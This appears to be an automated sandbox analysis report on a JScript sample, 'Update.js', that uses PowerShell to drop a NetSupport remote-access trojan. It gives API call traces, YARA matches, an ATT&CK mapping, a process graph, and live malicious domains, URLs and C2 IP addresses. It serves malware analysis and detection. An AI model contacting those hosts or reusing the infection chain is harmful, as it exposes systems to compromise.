                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,11_2_11174A69
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,11_2_6FA20F39
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_6FA21EB8
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,11_2_6FA21E5D
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,11_2_6FA21DB6
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoA,11_2_6FA2DC99
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_6FA21CC1
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,11_2_6FA2DC56
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,11_2_6FA2DB7C
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,11_2_6FA1FAE1
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,11_2_6FA21680
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,GetLocaleInfoA,GetLocaleInfoA,__itow_s,13_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoA,13_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_11174B90
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,11_2_110F37A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,11_2_11134830
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,11_2_11147160
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,11_2_1117594C
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,11_2_11145C70
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,11_2_11070430
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6F9FA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,11_2_6F9FA980
                                Source: Yara matchFile source: 18.2.client32.exe.6fb60000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.73f40000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.6fb60000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.6fb60000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.73f40000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.powershell.exe.1c9341746a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.73f40000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.0.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.powershell.exe.1c93417e8f0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.powershell.exe.1c93415dde8.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.6f9f0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2436230246.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2518264391.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2516794939.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2317672682.000001C9342A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000000.2515693268.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2317672682.000001C934153000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000000.2434122140.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2317672682.000001C93417C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2317672682.000001C933F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2518228905.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2437590353.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2317672682.000001C934171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000000.2312535683.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 2760, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information32
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		32
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts5
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		4
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		21
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		11
                                Software Packing                                		Security Account Manager1
                                System Service Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS3
                                File and Directory Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		14
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts2
                                Service Execution                                		1
                                Registry Run Keys / Startup Folder                                		113
                                Process Injection                                		11
                                Masquerading                                		LSA Secrets44
                                System Information Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media3
                                PowerShell                                		RC Scripts1
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Cached Domain Credentials261
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                                Virtualization/Sandbox Evasion                                		DCSync2
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation                                		Proc Filesystem41
                                Virtualization/Sandbox Evasion                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt113
                                Process Injection                                		/etc/passwd and /etc/shadow11
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                                System Owner/User Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1508730 Sample: Update.js Startdate: 10/09/2024 Architecture: WINDOWS Score: 100 37 moneymoj.com 2->37 39 ipva2024-detransp.com 2->39 41 geo.netsupportsoftware.com 2->41 53 Suricata IDS alerts for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 8 other signatures 2->59 8 wscript.exe 1 1 2->8         started        12 svchost.exe 1 1 2->12         started        14 client32.exe 2->14         started        16 client32.exe 2->16         started        signatures3 process4 dnsIp5 49 moneymoj.com 8.39.147.104, 443, 49718 CFA-INSTITUTEUS United States 8->49 73 System process connects to network (likely due to code injection or exploit) 8->73 75 JScript performs obfuscated calls to suspicious functions 8->75 77 Suspicious powershell command line found 8->77 79 3 other signatures 8->79 18 powershell.exe 15 37 8->18         started        51 127.0.0.1 unknown unknown 12->51 signatures6 process7 dnsIp8 43 ipva2024-detransp.com 79.141.161.172, 443, 49733 HZ-US-ASBG Bulgaria 18->43 29 C:\Users\user\AppData\...\remcmdstub.exe, PE32 18->29 dropped 31 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 18->31 dropped 33 C:\Users\user\AppData\...\client32.exe, PE32 18->33 dropped 35 6 other files (5 malicious) 18->35 dropped 61 Found suspicious powershell code related to unpacking or dynamic code loading 18->61 63 Powershell drops PE file 18->63 23 client32.exe 17 18->23         started        27 conhost.exe 18->27         started        file9 signatures10 process11 dnsIp12 45 5.181.159.137, 443, 49735 MIVOCLOUDMD Moldova Republic of 23->45 47 geo.netsupportsoftware.com 104.26.1.231, 49736, 80 CLOUDFLARENETUS United States 23->47 65 Multi AV Scanner detection for dropped file 23->65 67 Contains functionalty to change the wallpaper 23->67 69 Delayed program exit found 23->69 71 Contains functionality to detect sleep reduction / modifications 23->71 signatures13

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Update.js0%ReversingLabs

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL13%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL5%ReversingLabs
                                C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL17%ReversingLabs
                                C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL6%ReversingLabs
                                C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe27%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exe24%ReversingLabsWin32.Trojan.Generic

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://ipva2024-detransp.com/data.php?6891100%Avira URL Cloudphishing
                                https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p0%Avira URL Cloudsafe
                                http://5.181.159.137/fakeurl.htm0%Avira URL Cloudsafe
                                https://www.google.com/intl/en-US/chrome/blank.html0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.asp0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                https://www-googleapis-staging.sandbox.google.com0%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                https://moneymoj.com/cdn-vs/update.php?88100%Avira URL Cloudmalware
                                http://%s/testpage.htm0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.1.231
                                		truefalse
                                  		unknown
                                  ipva2024-detransp.com
                                  		79.141.161.172
                                  		truetrue
                                    		unknown
                                    moneymoj.com
                                    		8.39.147.104
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://moneymoj.com/cdn-vs/update.php?88true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://geo.netsupportsoftware.com/location/loca.aspfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ipva2024-detransp.com/data.php?6891true
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://5.181.159.137/fakeurl.htmtrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pwscript.exe, 00000000.00000003.2156349259.000001D0C871D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215978446.000001D0CD042000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210321815.000001D0CD165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211492021.000001D0CD18F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213825621.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214536981.000001D0CD1A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209630899.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209860589.000001D0CD26D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210803679.000001D0CD041000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215539051.000001D0CD1A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214982606.000001D0CD04C000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.google.com/intl/en-US/chrome/blank.htmlwscript.exe, 00000000.00000003.2210442052.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213461332.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211630069.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213566215.000001D0CD192000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209113379.000001D0CD044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212871998.000001D0CD187000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215778459.000001D0CD30A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210931576.000001D0CD168000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2160028757.000001D0C9611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214379787.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210203440.000001D0CD043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213173128.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214676945.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211789508.000001D0CD18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210554221.000001D0CD16D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211353920.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213694902.000001D0CD040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215259651.000001D0CD30D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212052812.000001D0CD046000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213968827.000001D0CD2D4000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://%s/testpage.htmclient32.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://127.0.0.1client32.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
